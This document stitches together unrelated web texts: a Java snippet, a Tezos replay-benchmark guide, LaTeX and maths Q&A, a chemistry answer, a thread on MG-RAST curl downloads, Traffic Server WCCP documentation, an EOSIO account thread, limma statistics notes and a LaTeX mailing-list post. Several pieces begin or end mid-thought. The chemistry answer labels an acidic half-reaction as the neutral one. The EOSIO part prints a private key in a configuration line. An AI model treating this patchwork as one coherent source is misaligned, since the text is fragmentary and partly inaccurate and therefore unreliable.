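For anyone landing here later, both suggestions can be combined into a small self-contained sketch. The class name `FilenameDemo` and the paths are just for illustration; note the `length - 1` indexing, which also fixes the out-of-bounds access in the question's code.

```java
import java.io.File;
import java.util.regex.Pattern;

public class FilenameDemo {
    // split() takes a regex, so the separator must be quoted before splitting
    static String lastComponent(String path, String separator) {
        String[] tokens = path.split(Pattern.quote(separator));
        return tokens[tokens.length - 1]; // length - 1: arrays are zero-indexed
    }

    public static void main(String[] args) {
        // Windows-style path, split on a literal backslash
        System.out.println(lastComponent("C:\\temt\\text.txt", "\\")); // text.txt
        // Simpler alternative: let java.io.File parse the path
        System.out.println(new File("/tmp/dir/text.txt").getName()); // text.txt
    }
}
```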
# Tezos reconstruction benchmark by replay
We DaiLambda are working on improving the Tezos blockchain storage layer, called the context. The context stores versions of blockchain states, including balances and smart contracts.
## Objective
We want to benchmark Tezos context reconstruction of the recent blocks, say 10000.
• Only recent blocks, not from the genesis.
• Blocks must be preloaded to exclude the network costs.
Currently we have 2 ways to replay blocks: reconstruct and replay.
## tezos-node reconstruct commits to the context, but always starts from the genesis
tezos-node reconstruct rebuilds the contexts from the genesis. It takes too long for a benchmark, several days or a week. We also do not want to benchmark the context reconstruction of the old cemented blocks, since a running node builds contexts only from floating blocks.
## tezos-node replay can replay blocks from a recent block, but does not commit contexts
The tezos-node replay command replays specified block levels, but it NEVER commits contexts: new versions of contexts are built in memory, then their hashes are compared with the contexts already imported on disk. For a precise benchmark, we want to commit the newly created contexts rather than just check the context hashes, since disk I/O is always a big performance factor of the node.
## Solution: replay with reconstruction
We have developed a hybrid of these 2 methods, replay+reconstruct. Using it, we can replay recent Tezos blocks and commit their context updates to the disk. From the viewpoint of the context storage layer, a benchmark using this replay with reconstruction is very similar to what the layer performs in an actual Tezos node.
Suppose that we want to replay blocks with the context reconstruction between levels $level1 and $level2.
The idea is:
• store/ carries the blocks between $level1 and $level2.
• context/ carries only the context at $level1.
• Let the tezos-node replay command apply the blocks between $level1 and $level2 consecutively and commit their contexts to the context/ directory.

### Prepare tezos-node

Your node must have the tezos-node replay command:

$ ./tezos-node --help
...
replay
Replay a set of previously validated blocks
...
### Prepare a full node
Prepare a full node and let $srcdir be the directory of the full node. Its storage version must be 0.0.5 or newer:

$ cat $srcdir/version.json
{ "version": "0.0.5" }

#### Upgrading storage

If the storage version is 0.0.4, you have to upgrade the data directory by:

$ ./tezos-node upgrade storage --data-dir $srcdir

NOTE: Recent master of tezos-node has a bug around --data-dir. You MUST make sure $srcdir/config.json exists and its data-dir field points to $srcdir.

### Check the data

You must first check that $level1 and $level2 are available in the node:

$ ./tezos-node replay --data-dir $srcdir $(($level1 + 1)) $level2
### Snapshot of $level1

Make a snapshot of level $level1:
$./tezos-node snapshot export --data-dir$srcdir --block $level1 tezos-mainnet-snapshot-full.$level1
NOTE: The snapshot MUST be taken by the new store. Currently, snapshots of v9.1 called “legacy snapshots” are NOT properly imported by the latest tezos-node.
### Prepare the starting context
Now import the snapshot to a new directory $importdir:

$ mkdir $importdir
$ ./tezos-node snapshot import --data-dir $importdir tezos-mainnet-snapshot-full.$level1
### Prepare the replay directory
Make another directory $replaydir for the replay.

Copy the store and JSON files of $srcdir:

$ cp -a $srcdir/store $replaydir/
$ cp $srcdir/*.json $replaydir/
Copy the context of $importdir:

$ cp -a $importdir/context $replaydir/
Reinitialize the directory:
$ ./tezos-node config reset --data-dir $replaydir
Now $replaydir/ is ready for reconstruction from $level1:
• store/: enough blocks to reconstruct between $level1 and $level2.
• context/: the context of $level1, the starting point of the reconstruction.

### Reconstruction by replay

Now the following should work:

$ ./tezos-node replay --data-dir $replaydir $((level1 + 1)) $((level1 + 2)) ...

tezos-node replay cannot take a range of block levels; you need to specify the levels one by one. When you rerun the reconstruction, you have to reset the context/ directory:

$ rm -rf $replaydir/context
$ cp -a $importdir/context $replaydir
$ ./tezos-node replay --data-dir $replaydir lev1 lev2 ...
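Since replay takes individual levels, a small shell helper can expand the range for you. This is a sketch: the helper name and level bounds are placeholders, and the tezos-node invocation is only echoed as a dry run (drop the echo to actually run it).

```shell
# Emit the levels (level1, level2] that must be replayed one by one
replay_levels() {
  seq "$(($1 + 1))" "$2"
}

# Dry run: print the tezos-node invocation for each level
for lvl in $(replay_levels 1500000 1500003); do
  echo ./tezos-node replay --data-dir "$replaydir" "$lvl"
done
```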
## Testing a modified node using historic data

If a modification to a node implementation changes context hashes, pure replay+reconstruct fails because the block application may produce context hashes different from the ones expected.

To make replay+reconstruct work even in this situation, tezos-node replay has a new option --ignore-context-hash-mismatch in https://gitlab.com/dailambda/tezos/-/tree/jun@replay-reconstruct . With this option, context hash mismatches are ignored: if a block $B_i$ with an expected context hash $H_i$ produces a context with a different context hash $H'_i$, the mismatch does not stop the validation when the option is enabled. The replay continues and commits the resulting context with $H'_i$, remembering the pair $(H_i, H'_i)$ in memory. At the replay of the next block $B_{i+1}$, the node requires the context of its predecessor $B_i$. Its context hash is $H_i$ in $B_i$, which is NOT found in the context DB. Instead we check out the context of $H'_i$ paired with $H_i$.

Thanks to this --ignore-context-hash-mismatch option we can quickly test and benchmark node modifications over historic block data, even if they might produce different context hashes.
## Future work
• It takes a very long time to export and import a snapshot for $level1. What we need here is just one context, and no store needs to be exported. It would be nice to have a tool that copies just one version of the context.
• Benchmarking fails if a shell or a protocol has modifications that affect context hashes. Now we have the --ignore-context-hash-mismatch option.
• Better UI.
# Add an exit sign / running person?
What is the simplest way to add a running person, similar to the one to the right in this image in my body text?
I cannot find any appropriate unicode glyph or LaTeX symbol. Do I need to include a picture or draw something with tikz?
• You can either create a `TikZ` sign or use available, like this. – m0nhawk Aug 6 '13 at 10:44
A previous answer suggests using Inkscape. You can also print the symbol to a PDF and then import it as a picture using the `graphicx` package and the command `\includegraphics{<image>}`. LaTeX can also work with SVG diagrams (after conversion); see the question How to include SVG diagrams in LaTeX?
`bla blup \tikz ...; bla blup`
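For the `\includegraphics` route, here is a minimal sketch; `exitsign` is a placeholder file name for your exported picture, and `\raisebox` just nudges the sign down toward the text baseline:

```latex
\documentclass{article}
\usepackage{graphicx}
\begin{document}
Evacuate via the marked route
\raisebox{-0.2\baselineskip}{\includegraphics[height=1em]{exitsign}} now.
\end{document}
```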
# n-factor of $KMn{{O}_{4}}$ in neutral medium is: A. 6 B. 5 C. 4 D. 3
Verified
139.8k+ views
Hint: n-factor is also known as valence factor, and for a neutral medium it can be defined as the change in oxidation state of an atom in a compound per molecule. $KMn{{O}_{4}}$ is neither an acid nor a base; it is actually neutral. It is a purplish-black solid which, when dissolved in water, gives intensely pink or purple solutions.
Step by step solution:
- $KMn{{O}_{4}}$ is a salt because it is produced from KOH, which is a strong base, and $MnO_{4}^{-}$ ions are produced from $HMn{{O}_{4}}$, which is an acid.
- The reaction in neutral medium is:
$MnO_{4}^{-}+4{{H}^{+}}+3{{e}^{-}}\to Mn{{O}_{2}}+2{{H}_{2}}O$
- We can calculate the oxidation state of Mn in $MnO_{4}^{-}$. Here, the charge present on oxygen is -2 and the overall charge is -1. So,
\begin{align} & x+\left( 4\times -2 \right)=-1 \\ & x+\left( -8 \right)=-1 \\ & x-8=-1 \\ & x=+7 \\ \end{align}
- Now we will calculate the oxidation state of Mn in $Mn{{O}_{2}}$. Here, the charge present on oxygen is -2 and the overall charge is 0. So,
\begin{align} & x+\left( 2\times -2 \right)=0 \\ & x+\left( -4 \right)=0 \\ & x=+4 \\ \end{align}
- We can see from the reaction that, in the neutral medium, $MnO_{4}^{-}$ is reduced to $Mn{{O}_{2}}$. Here the oxidation state of Mn changes from +7 to +4, for which 3 electrons are gained; hence the n-factor here is 3.
- Therefore we can conclude that option (D), that is 3, is correct.
On the left Graphics view, an enhanced phase portrait of a complex function is displayed. On the right Graphics view, one can see the approximation of the function through its Taylor polynomials $\sum_{k=0}^{n} a_k (z-z_0)^k$ at the blue base point $z_0$.
The complex function, the base point $z_0$, the order $n$ of the polynomial and the Zoom can be modified.
Note: The applet was originally written by Aaron Montag using Cindy.js. The source code can be found at GitHub.
# How do you solve 4x^2 + 2x - 1 = 0 by completing the square?
$x = \frac{\sqrt{5} - 1}{4}$ or $x = - \frac{\sqrt{5} + 1}{4}$

Dividing by $4$ we get

${x}^{2} + \frac{1}{2} x - \frac{1}{4} = 0$

Adding $\frac{1}{4}$ to both sides and then adding ${\left(\frac{1}{4}\right)}^{2} = \frac{1}{16}$ to complete the square:

${x}^{2} + \frac{1}{2} x + \frac{1}{16} = \frac{1}{4} + \frac{1}{16} = \frac{5}{16}$

${\left(x + \frac{1}{4}\right)}^{2} = \frac{5}{16}$

Taking square roots, $x + \frac{1}{4} = \pm \frac{\sqrt{5}}{4}$, so $x = \frac{- 1 \pm \sqrt{5}}{4}$.
8.6 years ago
bioinfo ▴ 830
parsing • 14k views
8.6 years ago
5heikki 10k
I did something like this a while back:
cat keywordTableSortedUniqueIds.txt
mgm4440036.3
mgm4440037.3
mgm4440038.3
mgm4440039.3
mgm4440040.3
mgm4440041.3
mgm4440055.3
mgm4440056.3
..

while read line
do
    curl "http://api.metagenomics.anl.gov/1/download/$line?file=425.1" > "$line.gz"
done < keywordTableSortedUniqueIds.txt
The "file=XXX" part specifies what exactly you want to download from the given metagenome, e.g. 425.1 here specifies predicted rRNA.
that was very helpful. I have just gone through the MG-RAST manual but didn't get much info about the "download stages or file=xxx/stage=xxx". As you mentioned, file=425.1 for predicted rRNA, Do you know what file no. should I use for raw original submitted metagenome fasta sequences? I tried "file=100.2" but not sure if it is right..!!
Hey, I'm not sure you can gain access to the raw data by the api, however, I think file=100.2 contains the reads/contigs that passed quality filtering. There's probably also a file that contains the reads/contigs that didn't pass QC, so you could combine those if you really wanted them. You could always ask at the mg-rast mailing list..
Thanks. Now I have decided to go for reads that passed QC filtering and dereplication stages..!!
Hi, Thanks for these details about how to download data from the MG-RAST api. Did you add your webkey to access data that is not public yet? Or were these public metagenomes? I tried adding my webkey:
but I just get a summary of the file info (bp_count etc), and I'm unable to download the fasta file.
Thank you!
Katrine
File 050.2 - This is the unfiltered metagenome that was originally uploaded to MG-RAST
File 100.1 - preprocess.passed.fna
File 100.2 - preprocess.removed (low quality)
File 350.2 & 350.3 - These are the protein coding genes (amino acids and nucleotides)
File 440.1 - These are predicted rRNA sequences (I do not recommend using MG-RAST for sensitive rRNA annotation. It does not use the internal structure of the gene, which other programs appropriately use for classification)
File 550.1 - This file shows clustered sequences which are 90% identical, to reduce the number of sequences that need to be annotated. Many folks don’t even know that this happens within MG-RAST.
File 650.1 & 650.2 - These files are essentially the blat tabular output from comparing your sequence to the database.
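Putting the file numbers above to use, here is a sketch of a downloader for the QC-passed reads (file 100.1, preprocess.passed.fna). The helper name is illustrative, and the printf stands in for reading keywordTableSortedUniqueIds.txt; the curl line is only echoed as a dry run.

```shell
# Build the MG-RAST download URL for a metagenome id and processing stage
mgrast_url() {
  echo "http://api.metagenomics.anl.gov/1/download/$1?file=$2"
}

# Dry run over a couple of ids (replace printf with: < keywordTableSortedUniqueIds.txt)
printf 'mgm4440036.3\nmgm4440037.3\n' | while read -r id; do
  echo curl "$(mgrast_url "$id" 100.1)" -o "$id.fna.gz"
done
```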
Hello, what language is this besides curl? I have a windows computer and am using curl through the command prompt, and would like to do something similar to what you described.
It's Bash. I presume you could get Bash working on Windows with Cygwin or something but I haven't used Windows since XP so I can't really say. Alternatively, it probably doesn't take much effort to make a simple while read line loop with something that works on Windows by default like Python (?) or Java (?). If you plan to do lots of bioinformatics in the future, I suggest you ditch Windows for Linux or OS X.
Update- I downloaded Git Bash for windows, and I think I am having success using bash and curl with the command you listed. I am not very experienced with the Bash language yet, so I haven't added in any echo tests to see if the script is working the way I think it is. I do agree with you that windows is a hassle, but many times there are work-arounds. I will continue down this line for the people who use Windows and can not afford to/do not want to switch operating systems.
# Tag Info
Initially the label $a$ represents the site on a lattice with sites separated by distance $l$, i.e., the discrete position for each of a collection of oscillators, $q_a$, with an oscillator at each lattice site. When we take the continuum limit, $l\to0$, the label $a$ becomes continuous, i.e. it becomes the position variable $x$. We now have an infinite ...
In general, bound states in lattice QCD are found by analyzing correlation functions of operators with the appropriate quantum numbers. This works both for baryons and mesons, even for pure-glue states like glueballs. See for example these introductory lecture notes: http://arxiv.org/abs/hep-lat/9807028. Chapter 17 should answer your questions in more ...
The first thing to realise here is that in your Hamiltonian formulation, the lattice constant is implicitly set to $b=1$ (I'm calling it $b$, not to confuse it with the lattice operators). Next you can identify, if you're working in two dimensions, $x=am$ and $y=bn$, yielding $\hat{H}_0=-J\big(\sum_{(x/b),(y/b)} \ldots\big)$
Sward, G. L., Transfinite Sequences of Axiom Systems for Set Theory (1971) Szász, Domokos, Joint Diffusion on the Line (1979) Szász, D. ; Telcs, A., Random Walk in an Inhomogeneous Medium with Local Impurities (1981) Szász, Paul, On Generalized Quasi-Step and Almost-Step Parabolas, Respectively (1963) Szász, Paul, On a Sum Concerning the Zeros of the Jacobi Polynomials with Application to the Theory of Generalized Quasi-Step Parabolas (1964) Szász, Paul, The Extended Hermite--Fejér Interpolation Formula with Application to the Theory of Generalized Almost-Step Parabolas (1964) Szász, Paul, Application of the End-Calculus of Hilbert to the Bisectors of the Defect of a Triangle in the Hyperbolic Plane (1967) Szczerba, L. W., Metamathematical Properties of Some Affine Geometries (1964) Szczerba, L. W., Metamathematical Properties of Some Affine Geometries (1965) Szczerba, L. W., Interpretability of Elementary Theories (1976)
# WCCP Configuration
WCCP is a de-facto semi-standard used by routers to redirect network traffic to caches. It is available on most Cisco™ routers, although it does not appear to be officially supported by Cisco. The primary benefits of WCCP are
• If already have a router that supports WCCP inline you do not have to change your network topology.
• WCCP fails open so that if the Traffic Server machine fails, it is bypassed and users continue to have Internet access.
Use of WCCP only makes sense for client side transparency [1] because if the clients are explicitly proxied by Traffic Server there’s no benefit to WCCP fail open, as the clients will continue to directly access the unresponsive Traffic Server host. It would be better to adjust the routing tables on the router for explicit proxying.
Because the router serves as the inline network element, Traffic Server must run on a separate host. This host can be located anywhere as long as Traffic Server is either on the same network segment or a GRE tunnel can be maintained between the Traffic Server host and the router.
This document presumes that the router is already properly configured to handle traffic between the clients and the origin servers. If you are not certain, verify it before attempting to configure Traffic Server with WCCP. This is also a good state to which to revert should the configuration go badly.
## Configuration overview
Setting WCCP is a three step process, first configuring the router, the Traffic Server host, and Traffic Server.
The router will not respond to WCCP protocol packets unless explicitly configured to do so. Via WCCP, the router can be made to perform packet interception and redirection needed by Traffic Server transparency. The WCCP protocol in effect acts as means of controlling a rough form of policy routing with positive heartbeat cutoff.
The Traffic Server host system must also be configured using iptables to accept connections on foreign addresses. This is done roughly the same way as the standard transparency use.
Finally Traffic Server itself must be configured for transparency and use of WCCP. The former is again very similar to the standard use, while WCCP configuration is specific to WCCP and uses a separate configuration file, referred to by the records.config file.
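As a point of reference, the iptables/TPROXY setup on the Traffic Server host typically looks something like the sketch below. The port 8080 and the 1/1 mark are illustrative placeholders, not values mandated by Traffic Server, and the commands are only echoed as a dry run; remove the `apply` wrapper and run as root to actually install the rules.

```shell
# Dry run: print each rule instead of applying it (remove 'echo' to apply, as root)
apply() { echo "$@"; }

# Deliver packets carrying the TPROXY mark to the local host
apply ip rule add fwmark 1/1 table 1
apply ip route add local 0.0.0.0/0 dev lo table 1

# Intercept inbound HTTP and hand it to Traffic Server's transparent port
apply iptables -t mangle -A PREROUTING -p tcp --dport 80 \
      -j TPROXY --on-ip 0.0.0.0 --on-port 8080 --tproxy-mark 1/1
```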
The primary concern for configuration is which of the three basic topologies is to be used.
• Dedicated – Traffic Server traffic goes over an interface that is not used for client nor origin server traffic.
• Shared – Traffic Server traffic shares an interface with client or server traffic.
• Inside Shared – Traffic Server and client traffic share an interface.
• Outside Shared – Traffic Server and origin server traffic share an interface.
In general the dedicated topology is preferred. However, if the router has only two interfaces, one of the shared topologies will be required [2]. Click the links above for more detailed configuration information on a specific topology.
### Shared interface issues
A shared interface topology has additional issues compared to a dedicated topology that must be handled. Such a topology is required if the router has only two interfaces, and because of these additional issues it is normally only used in such cases, although nothing prevents its use even if the router has three or more interfaces.
The basic concept for a shared interface is to use a tunnel to simulate the dedicated interface case. This enables the packets to be distinguished at layer 3. For this reason, layer 2 redirection cannot be used because the WCCP configuration cannot distinguish between packets returning from the origin server and packets returning from Traffic Server as they are distinguished only by layer 2 addressing [3]. Fortunately the GRE tunnel used for packet forwarding and return can be used as the simulated interface for Traffic Server.
### Frequently encountered problems
#### MTU and fragmentation
In most cases the basic configuration using a tunnel in any topology can fail due to issues with fragmentation. The socket logic is unable to know that its packets will eventually be put in to a tunnel which will by its nature have a smaller MTU than the physical interface which it uses. This can lead to pathological behavior or outright failure as the packets sent are just a little too big. It is not possible to solve easily by changing the MTU on the physical interface because the tunnel interface uses that to compute its own MTU.
## References
[1] Server side transparency should also be used, but it is not as significant. In its absence, however, origin servers may see the source address of connections suddenly change from the Traffic Server address to client addresses, which could cause problems. Further, the primary reason for not having server side transparency is to hide client addresses which is defeated if the Traffic Server host fails.
[2] If your router has only one interface, it’s hardly a router.
[3] This is not fundamentally impossible, as the packets are distinct in layer |
# How are all accounts listed and how is the first account created?
If I want to list all accounts, how is that done? (not for a key but to see what accounts actually exist).
I know
cleos get accounts
can be used for a particular key. But I am trying to find out on my new install what accounts exist. How do I create the first account I guess is the problem? Because the
cleos create account
I don't think there's any built-in command to list all existing accounts. On mainnet, EOSNewYork maintains a daily updated snapshot of all existing accounts here, but that is done by querying the ledger periodically.
The first account on a single-node testnet is the one you pass to nodeos with the flag --producer-name, e.g.

$ nodeos --producer-name eosio --enable-stale-production

has the account eosio producing blocks by default. I don't believe there's any automatic way to keep track of the accounts created afterwards; you'd have to inspect the entire ledger. In your example, you'd use

$ cleos create account eosio <new-account-name> <pub-key-for-owner> <pub-key-for-active>
• I get this - cleos create account eosio trevoro1 EOS7oVsWPXFXYrxZARSf5qZ5ApSYwX882VpFdqESWap4ecxiUH7Jc EOS7oVsWPXFXYrxZARSf5qZ5ApSYwX882VpFdqESWap4ecxiUH7Jc Error 3090003: Provided keys, permissions, and delays do not satisfy declared authorizations Ensure that you have the related private keys inside your wallet and your wallet is unlocked Any idea what could be reason. The public key is correct as in the wallet. – Trevor Lee Oakley Aug 9 '18 at 8:41
• did you import the private key of eosio from config.ini in your wallet? is the key from cleos get account eosio in cleos wallet keys output? – confused00 Aug 9 '18 at 8:50
• You must be a genius. This appeared to work - cleos create account eosio trevoro1 EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV executed transaction: eb5690fb9add0ca6bf563a88ac867a638e362cbb2ad2967f045bfe47ded587b8 200 bytes 440 us # eosio <= eosio::newaccount {"creator":"eosio","name":"trevoro1","owner":{"threshold":1,"keys":[{"key":"EOS6MRyAjQq8ud7hVNYcfnVP... warning: transaction executed locally, but may not be confirmed by the network yet ] – Trevor Lee Oakley Aug 9 '18 at 9:04
This was answered already by confused00 but to augment his answer for anyone else -
# (DEPRECATED - Use signature-provider instead) Tuple of [public key, WIF private key] (may specify multiple times) (eosio::producer_plugin)
# private-key =
# Key=Value pairs in the form <public-key>=<provider-spec>
# Where:
#    <public-key>     is a string form of a valid EOSIO public key
#    <provider-spec>  is a string in the form <provider-type>:<data>
#    <provider-type>  is KEY, or KEOSD
#    KEY:    <data> is a string form of a valid EOSIO private key which maps to the provided public key
#    KEOSD:  <data> is the URL where keosd is available and the appropriate wallet(s) are unlocked (eosio::producer_plugin)
signature-provider = EOS6MRyAjQq8ud7hVNYcfnVPJqcVpscN5So8BhtHuGYqET5GDW5CV=KEY:5KQwrPbwdL6PhXujxW37FSSQZ1JiwsST4cqQzDeyXtP79zkvFD3
You need the keys specified under signature-provider in config.ini, then use them as he stated in his answer. |
### Overview
In a multicenter study, our ODAC algorithm allows researchers to fit a Cox regression model across multiple data sets without directly sharing subject-level information. The Cox regression model is a commonly used approach for modeling a time-to-event outcome with a set of explanatory variables, and is a foundational method for studying associations, estimating causal effects, and predicting the risk of an event. Before conducting the multicenter analysis, all datasets have to be converted to a unified format in which all variables are defined in a standard way (e.g., the OMOP Common Data Model). We require one of the sites to be the coordinating site and the rest to be participating sites. The coordinating site is responsible for obtaining and broadcasting the initial value of the model parameters, synthesizing the information obtained from the other sites, and producing the final results. The participating sites only need to calculate the aggregate data and transfer them to the coordinating site. A more detailed description is provided below.
### Cox Regression Model
Suppose we have K sites, and the coordinating site is the first site. Let $$X$$ be a vector denoting $$p$$ risk factors and let $$T$$ be the time-to-event for the outcome of interest. The Cox model assumes the hazard at time t follows
$$\lambda(t|X) = \lambda_{0}(t)\exp(\beta^{T}X)$$
where $$\lambda_{0}(t)$$ is the baseline hazard function and $$\beta$$ is the vector of regression coefficients (there is no separate intercept; it is absorbed into the baseline hazard).
### Algorithm
#### Our algorithm has three steps:
1. First, the coordinating site fits a Cox regression model using its own data, and shares the estimate of the regression coefficients $$\bar{\beta}$$ with the participating sites.
2. Second, each participating site calculates the first- and second-order gradients of its own likelihood function, evaluated at the initial value $$\bar{\beta}$$. Explicit formulas for these two terms can be found in [1]. The aggregate data are then transferred to the coordinating site.
3. Third, the coordinating site uses the aggregate information together with its own individual-level data to obtain an improved estimate of $$\beta$$.
Figure 2 below gives an example of the information shared at each step in a setting with one explanatory variable in the model.
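The per-site computation in step 2 amounts to evaluating the gradient and Hessian of the local Cox log partial likelihood at $$\bar{\beta}$$. Below is a minimal R sketch of that computation (an editor's illustration, not the package's code; function and variable names are ours, and tied event times are ignored for brevity):

```r
# Hedged sketch: gradient and Hessian of one site's Cox log partial
# likelihood, evaluated at the shared initial value beta_bar.
cox_gradients <- function(X, time, status, beta_bar) {
  ord <- order(time)
  X <- X[ord, , drop = FALSE]; status <- status[ord]
  n <- nrow(X); p <- ncol(X)
  w <- exp(drop(X %*% beta_bar))          # per-subject risk weights
  grad <- numeric(p); hess <- matrix(0, p, p)
  for (i in which(status == 1)) {
    risk <- i:n                            # subjects still at risk at time[i]
    S0 <- sum(w[risk])
    S1 <- colSums(w[risk] * X[risk, , drop = FALSE])
    Xbar <- S1 / S0                        # weighted average covariate
    grad <- grad + X[i, ] - Xbar           # first-order term
    S2 <- crossprod(X[risk, , drop = FALSE] * sqrt(w[risk]))
    hess <- hess - (S2 / S0 - tcrossprod(Xbar))  # second-order term
  }
  list(gradient = grad, hessian = hess)
}
```

Each participating site would transfer only `gradient` and `hessian` (p and p × p numbers), never the rows of `X`.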
### Sample code
Set the “control” list in R as below to start the ODAC algorithm:
control <- list(project_name = 'Lung cancer study',
                step = 'initialize',
                sites = c('site1', 'site2', 'site3'),
                heterogeneity = FALSE,
                model = 'ODAC',
                family = 'cox',
                outcome = "status",
                variables = c('age', 'sex'),
                optim_maxit = 100)
demo(ODAC) |
# Choose a job you love, and you will never have to work a day in your life What does this quote mean?
###### Question:
Choose a job you love, and you will never have to work a day in your life
What does this quote mean?
What philosophy does the quote belong to? Describe the beliefs.
How might this quote affect people’s beliefs today?
|
Question: limma moderated t-statistics and B-statistics
15.0 years ago by
Gordon Smyth
Walter and Eliza Hall Institute of Medical Research, Melbourne, Australia
Gordon Smyth wrote:
This is to respond to a number of questions about the interpretation of the moderated t and B-statistics in limma. This will be a section of the Limma User's Guide in the next release.
Gordon
----------------------------------
Statistics for Differential Expression
A number of summary statistics are computed by the eBayes() function for each gene and each contrast. The M-value (M) is the log2-fold change, or sometimes the log2-expression level, for that gene. The A-value (A) is the average expression level for that gene across all the arrays and channels. The moderated t-statistic (t) is the ratio of the M-value to its standard error. This has the same interpretation as an ordinary t-statistic except that the standard errors have been moderated across genes, effectively borrowing information from the ensemble of genes to aid with inference about each individual gene. The ordinary t-statistics are not usually required or recommended, but they can be recovered by
> tstat.ord <- fit$coef / fit$stdev.unscaled / fit$sigma
after fitting a linear model. The ordinary t-statistic is on fit$df.residual degrees of freedom while the moderated t-statistic is on fit$df.residual+fit$df.prior degrees of freedom.
The p-value (p-value) is obtained from the moderated t-statistic, usually after some form of adjustment for multiple testing. The most popular form of adjustment is "fdr", which is Benjamini and Hochberg's method to control the false discovery rate. The meaning of the adjusted p-value is as follows. If you select all genes with p-value below a given value, say 0.05, as differentially expressed, then the expected proportion of false discoveries in the selected group should be less than that value, in this case less than 5%.
The B-statistic (lods or B) is the log-odds that the gene is differentially expressed. Suppose for example that B=1.5. The odds of differential expression is exp(1.5)=4.48, i.e., about four and a half to one. The probability that the gene is differentially expressed is 4.48/(1+4.48)=0.82, i.e., the probability is about 82% that this gene is differentially expressed. A B-statistic of zero corresponds to a 50-50 chance that the gene is differentially expressed. The B-statistic is automatically adjusted for multiple testing by assuming that 1% of the genes, or some other percentage specified by the user, are expected to be differentially expressed. If there are no missing values in your data, then the moderated t and B statistics will rank the genes in exactly the same order. Even if you do have spot weights or missing data, the p-values and B-statistics will usually provide a very similar ranking of the genes.
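The arithmetic in this example is easy to reproduce at the R prompt:

```r
B <- 1.5
odds <- exp(B)             # about 4.48
odds / (1 + odds)          # about 0.82
```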
Please keep in mind that the moderated t-statistic p-values and the B-statistic probabilities depend on various sorts of mathematical assumptions which are never exactly true for microarray data. The B-statistics also depend on a prior guess for the proportion of differentially expressed genes. Therefore they are intended to be taken as a guide rather than as a strict measure of the probability of differential expression. Of the three statistics, the moderated-t, the associated p-value and the B-statistics, we usually base our gene selections on the p-value. All three measures are closely related, but the moderated-t and its p-value do not require a prior guess for the number of differentially expressed genes.
The above mentioned statistics are computed for every contrast for each gene. The eBayes() function computes one more useful statistic. The moderated F-statistic (F) combines the t-statistics for all the contrasts for each gene into an overall test of significance for that gene. The moderated F-statistic tests whether any of the contrasts are non-zero for that gene, i.e., whether that gene is differentially expressed on any contrast. The moderated-F has numerator degrees of freedom equal to the number of contrasts and denominator degrees of freedom the same as the moderated-t. Its p-value is stored as fit$F.p.value. It is similar to the ordinary F-statistic from analysis of variance except that the denominator mean squares are moderated across genes.
In a complex experiment with many contrasts, it may be desirable to select genes firstly on the basis of their moderated F-statistics, and subsequently to decide which of the individual contrasts are significant for those genes. This cuts down on the number of tests which need to be conducted and therefore on the amount of adjustment for multiple testing. The functions classifyTestsF() and decideTests() are provided for this purpose.
microarray limma |
# How do you expand or condense a logarithm?
Category: Logarithms »
Relevant MM Lessons:
## Overview: Expanding and Collapsing Logarithms
This question has its own dedicated lesson ». Make sure to check it out if you need a more thorough read, or want to become an expert on how expanding and condensing log expressions each show up on tests. Here are the short notes on each log process; check out the full lesson for extra background and understanding.
## Expanding Logarithms
When we're asked to expand a logarithm, we will be given a single log expression and are expected to write it as the sum and/or difference of several simpler logarithms. What that comes down to for us is that every factor in the numerator of the log argument will be its own positive logarithm, and every factor in the denominator of the log argument will be its own negative logarithm. If any factor has an exponent, that exponent will be placed in front of the corresponding log as a multiplier. For example:$$\log \left( \frac{x^2 y}{w^3 z^5} \right)$$$$=2 \log (x) + \log(y) - 3\log (w) - 5 \log(z)$$Make sure every log has only a single, simple object in it when you're done. If you want to see more difficult problems or better understand why this end result always happens, read the dedicated lesson » on expanding logs.
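A quick numerical sanity check of the expansion rule (a throwaway sketch with arbitrary positive values for the variables):

```python
import math

x, y, w, z = 2.0, 3.0, 5.0, 7.0
# Left side: the single condensed logarithm
lhs = math.log(x**2 * y / (w**3 * z**5))
# Right side: the fully expanded sum/difference form
rhs = 2*math.log(x) + math.log(y) - 3*math.log(w) - 5*math.log(z)
assert abs(lhs - rhs) < 1e-12
```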
## Condensing Logarithms
When we're asked to condense a logarithmic expression, we are essentially doing the opposite of what we just saw for expanding. The problems we'll see will have the sum or difference of several logs, with and without coefficients in front. Our job is to first bring any coefficients inside the logarithms, and then to compile the pieces into a single logarithm with a single argument. Similar to the concepts involved with expanding logs, positive logs will turn into numerator items, while negative logs will end up in the denominator. It is possible to become masterful at this and crush problems flawlessly with one step, but I recommend two for clarity. For example:$$4\log(a+b) - \log(x) - 3\log(c) + 2\log(w) - \log (y-z) + 2\log (4)$$I recommend quickly writing things with no coefficients. Then you'll have each piece ready to place.$$\log\big[ (a+b)^4 \big] - \log(x) - \log\big(c^3 \big) +\log\big(w^2\big) - \log (y-z) + \log (16)$$$$\longrightarrow \log \left( \frac{16(a+b)^4 w^2}{c^3 x(y-z)} \right)$$Note that for condensing logs, all the log expressions must be the same log base - otherwise you cannot combine them! There are ways teachers can try and trick you with this stuff - again refer to the dedicated lesson » for more tips and a more thorough explanation.
|
# [texhax] Clash between \emph and \xspace
Uwe Lueck uwe.lueck at web.de
Wed Nov 15 14:44:43 CET 2006
At 19:40 04.11.06, Michael Barr wrote:
> If you compile the following file:
>
> \documentclass{article}
> \usepackage{xspace}
> \newcommand{\lin}{Lindel\"of\xspace}
> \begin{document}
> (property we call \emph{amply \lin})
>
> (property we call {\it amply \lin})
>
> (property we call {\it amply \lin\/})
> \end{document}
>
> you will see Goldilocks spacing after Lindel\"of''. Since the second
> one is much too close, you can see that it is not the case that \xspace
> has added a space. I assume that the problem is that both macros use
> \futurelet. Any suggestions?
What clash? (Try additional tests attached below.)
What you see is, maybe, a clash between \it and \xspace,
and as Martin points out, this is no surprise.
You see that \emph and \xspace interact entirely properly
(to my own surprise!). You are right, \xspace doesn't insert
interword glue between Lindel\"of and the closing bracket
-- if it did so, it would be a bug! It is the basic idea of xspace
to check whether inserting a \space is appropriate.
But note that I am using v1.12 (2006/05/08) of xspace.sty.
Earlier versions of xspace were very simple; now it is very,
very complex; I haven't yet understood it.
Best,
Uwe.
\documentclass{article}
\usepackage{xspace}
\newcommand{\lin}{Lindel\"of\xspace}
\begin{document}
\emph{\lin}and others
{\it \lin}and others
{\it \lin \/}and others
(property we call \emph{\lin})
(property we call {\it\lin})
(property we call {\it\lin\/})
